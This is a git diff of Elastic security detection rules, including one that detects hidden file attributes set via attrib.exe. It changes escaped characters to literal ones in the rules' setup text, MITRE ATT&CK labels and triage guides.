74ffd1ce116..1e70a008ce9 100644 --- a/packages/security_detection_engine/kibana/security_rule/45d273fb-1dca-457d-9855-bcb302180c21_107.json +++ b/packages/security_detection_engine/kibana/security_rule/45d273fb-1dca-457d-9855-bcb302180c21_107.json @@ -63,7 +63,7 @@ ], "risk_score": 47, "rule_id": "45d273fb-1dca-457d-9855-bcb302180c21", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/45d273fb-1dca-457d-9855-bcb302180c21_108.json b/packages/security_detection_engine/kibana/security_rule/45d273fb-1dca-457d-9855-bcb302180c21_108.json index 935694a0ef3..16ca1b9ed0e 100644 --- a/packages/security_detection_engine/kibana/security_rule/45d273fb-1dca-457d-9855-bcb302180c21_108.json +++ b/packages/security_detection_engine/kibana/security_rule/45d273fb-1dca-457d-9855-bcb302180c21_108.json @@ -63,7 +63,7 @@ ], "risk_score": 47, "rule_id": "45d273fb-1dca-457d-9855-bcb302180c21", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/45d273fb-1dca-457d-9855-bcb302180c21_109.json b/packages/security_detection_engine/kibana/security_rule/45d273fb-1dca-457d-9855-bcb302180c21_109.json index bb254ae4058..06cb6816253 100644 --- a/packages/security_detection_engine/kibana/security_rule/45d273fb-1dca-457d-9855-bcb302180c21_109.json +++ b/packages/security_detection_engine/kibana/security_rule/45d273fb-1dca-457d-9855-bcb302180c21_109.json @@ -68,7 +68,7 @@ ], "risk_score": 47, "rule_id": "45d273fb-1dca-457d-9855-bcb302180c21", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -81,7 +81,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/4630d948-40d4-4cef-ac69-4002e29bc3db_104.json b/packages/security_detection_engine/kibana/security_rule/4630d948-40d4-4cef-ac69-4002e29bc3db_104.json index 8d76834eea2..39026681945 100644 --- a/packages/security_detection_engine/kibana/security_rule/4630d948-40d4-4cef-ac69-4002e29bc3db_104.json +++ b/packages/security_detection_engine/kibana/security_rule/4630d948-40d4-4cef-ac69-4002e29bc3db_104.json @@ -50,7 +50,7 @@ ], "risk_score": 21, "rule_id": "4630d948-40d4-4cef-ac69-4002e29bc3db", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/4630d948-40d4-4cef-ac69-4002e29bc3db_105.json b/packages/security_detection_engine/kibana/security_rule/4630d948-40d4-4cef-ac69-4002e29bc3db_105.json index 4f4dfd63171..edf4a99aca5 100644 --- a/packages/security_detection_engine/kibana/security_rule/4630d948-40d4-4cef-ac69-4002e29bc3db_105.json +++ b/packages/security_detection_engine/kibana/security_rule/4630d948-40d4-4cef-ac69-4002e29bc3db_105.json @@ -70,7 +70,7 @@ ], "risk_score": 21, "rule_id": "4630d948-40d4-4cef-ac69-4002e29bc3db", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -82,7 +82,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -104,7 +104,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/4630d948-40d4-4cef-ac69-4002e29bc3db_106.json b/packages/security_detection_engine/kibana/security_rule/4630d948-40d4-4cef-ac69-4002e29bc3db_106.json index d387318324e..d5d00113348 100644 --- a/packages/security_detection_engine/kibana/security_rule/4630d948-40d4-4cef-ac69-4002e29bc3db_106.json +++ b/packages/security_detection_engine/kibana/security_rule/4630d948-40d4-4cef-ac69-4002e29bc3db_106.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Adding Hidden File Attribute via Attrib", - "note": "## Triage and analysis\n\n### Investigating Adding Hidden File Attribute via Attrib\n\nThe `Hidden` attribute is a file or folder attribute that makes the file or folder invisible to regular directory listings when the attribute is set. \n\nAttackers can use this attribute to conceal tooling and malware to prevent administrators and users from finding it, even if they are looking specifically for it.\n\nThis rule looks for the execution of the `attrib.exe` utility with a command line that indicates the modification of the `Hidden` attribute.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to identify the target file or folder.\n - Examine the file, which process created it, header, etc.\n - If suspicious, retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Adding Hidden File Attribute via Attrib\n\nThe `Hidden` attribute is a file or folder attribute that makes the file or folder invisible to regular directory listings when the attribute is set. \n\nAttackers can use this attribute to conceal tooling and malware to prevent administrators and users from finding it, even if they are looking specifically for it.\n\nThis rule looks for the execution of the `attrib.exe` utility with a command line that indicates the modification of the `Hidden` attribute.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to identify the target file or folder.\n - Examine the file, which process created it, header, etc.\n - If suspicious, retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"attrib.exe\" or process.pe.original_file_name == \"ATTRIB.EXE\") and process.args : \"+h\" and\n not\n (process.parent.name: \"cmd.exe\" and\n process.command_line: \"attrib +R +H +S +A *.cui\" and\n process.parent.command_line: \"?:\\\\WINDOWS\\\\system32\\\\cmd.exe /c \\\"?:\\\\WINDOWS\\\\system32\\\\*.bat\\\"\")\n", "related_integrations": [ { @@ -82,7 +82,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -104,7 +104,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/4630d948-40d4-4cef-ac69-4002e29bc3db_107.json b/packages/security_detection_engine/kibana/security_rule/4630d948-40d4-4cef-ac69-4002e29bc3db_107.json index eed917228d4..555d0b11c8c 100644 --- a/packages/security_detection_engine/kibana/security_rule/4630d948-40d4-4cef-ac69-4002e29bc3db_107.json +++ b/packages/security_detection_engine/kibana/security_rule/4630d948-40d4-4cef-ac69-4002e29bc3db_107.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Adding Hidden File Attribute via Attrib", - "note": "## Triage and analysis\n\n### Investigating Adding Hidden File Attribute via Attrib\n\nThe `Hidden` attribute is a file or folder attribute that makes the file or folder invisible to regular directory listings when the attribute is set. \n\nAttackers can use this attribute to conceal tooling and malware to prevent administrators and users from finding it, even if they are looking specifically for it.\n\nThis rule looks for the execution of the `attrib.exe` utility with a command line that indicates the modification of the `Hidden` attribute.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to identify the target file or folder.\n - Examine the file, which process created it, header, etc.\n - If suspicious, retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Adding Hidden File Attribute via Attrib\n\nThe `Hidden` attribute is a file or folder attribute that makes the file or folder invisible to regular directory listings when the attribute is set. \n\nAttackers can use this attribute to conceal tooling and malware to prevent administrators and users from finding it, even if they are looking specifically for it.\n\nThis rule looks for the execution of the `attrib.exe` utility with a command line that indicates the modification of the `Hidden` attribute.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to identify the target file or folder.\n - Examine the file, which process created it, header, etc.\n - If suspicious, retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"attrib.exe\" or process.pe.original_file_name == \"ATTRIB.EXE\") and process.args : \"+h\" and\n not\n (process.parent.name: \"cmd.exe\" and\n process.command_line: \"attrib +R +H +S +A *.cui\" and\n process.parent.command_line: \"?:\\\\WINDOWS\\\\system32\\\\cmd.exe /c \\\"?:\\\\WINDOWS\\\\system32\\\\*.bat\\\"\")\n", "related_integrations": [ { @@ -81,7 +81,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -103,7 +103,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/4630d948-40d4-4cef-ac69-4002e29bc3db_108.json b/packages/security_detection_engine/kibana/security_rule/4630d948-40d4-4cef-ac69-4002e29bc3db_108.json index 0d6a4b32ef8..e0c9184d33f 100644 --- a/packages/security_detection_engine/kibana/security_rule/4630d948-40d4-4cef-ac69-4002e29bc3db_108.json +++ b/packages/security_detection_engine/kibana/security_rule/4630d948-40d4-4cef-ac69-4002e29bc3db_108.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Adding Hidden File Attribute via Attrib", - "note": "## Triage and analysis\n\n### Investigating Adding Hidden File Attribute via Attrib\n\nThe `Hidden` attribute is a file or folder attribute that makes the file or folder invisible to regular directory listings when the attribute is set. \n\nAttackers can use this attribute to conceal tooling and malware to prevent administrators and users from finding it, even if they are looking specifically for it.\n\nThis rule looks for the execution of the `attrib.exe` utility with a command line that indicates the modification of the `Hidden` attribute.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to identify the target file or folder.\n - Examine the file, which process created it, header, etc.\n - If suspicious, retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Adding Hidden File Attribute via Attrib\n\nThe `Hidden` attribute is a file or folder attribute that makes the file or folder invisible to regular directory listings when the attribute is set. \n\nAttackers can use this attribute to conceal tooling and malware to prevent administrators and users from finding it, even if they are looking specifically for it.\n\nThis rule looks for the execution of the `attrib.exe` utility with a command line that indicates the modification of the `Hidden` attribute.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to identify the target file or folder.\n - Examine the file, which process created it, header, etc.\n - If suspicious, retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - 